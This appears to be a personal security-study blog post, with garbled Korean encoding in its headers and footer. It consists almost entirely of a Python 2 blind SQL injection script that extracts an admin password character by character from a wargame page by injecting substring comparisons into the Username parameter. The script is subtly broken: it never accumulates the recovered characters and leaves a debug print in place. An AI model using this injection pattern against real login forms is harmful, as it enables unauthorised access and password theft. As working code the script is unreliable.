Security Study/Source

Blind Sql Injection

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 11. 21.
728x90
๋ฐ˜์‘ํ˜•
  1. #http2,1)%3C%27N%27)--+&pw=admin
  2. import urllib
  3. import urllib2
  4.  
  5. ans =""
  6. ans2=""
  7.  
  8. for i in range(1,11):
  9.     for j in range(33,127) :
  10.         url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password,"
  11.         url1=url1+str(i)+",1)='"
  12.         url1=url1+chr(j)+"')--+&pw=1"
  13.         try:
  14.             #print url1;
  15.             req = urllib2.Request(url1)
  16.             print 1111
  17.             req.add_header('cookie',"PHPSESSID=")
  18.             res = urllib2.urlopen(req)
  19.             data = res.read()
  20.             if data.find("OK") != -1:
  21.                 print chr(j)
  22.                 ans=ans2
  23.                 break;
  24.  
  25.         except:
  26.             j=j+1
  27.             continue
  28.      
  29. print ans


728x90
๋ฐ˜์‘ํ˜•

'Security Study > Source' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

mac ํ„ฐ๋ฏธ๋„ vim ๊พธ๋ฏธ๊ธฐ  (0) 2015.12.10
rtl chain  (0) 2015.11.21
sql injection reverse  (0) 2015.11.21
์†Œ์ผ“ํ”„๋กœ๊ทธ๋ž˜๋ฐ  (0) 2015.11.21
Base 64 encoding  (0) 2015.11.21

๋Œ“๊ธ€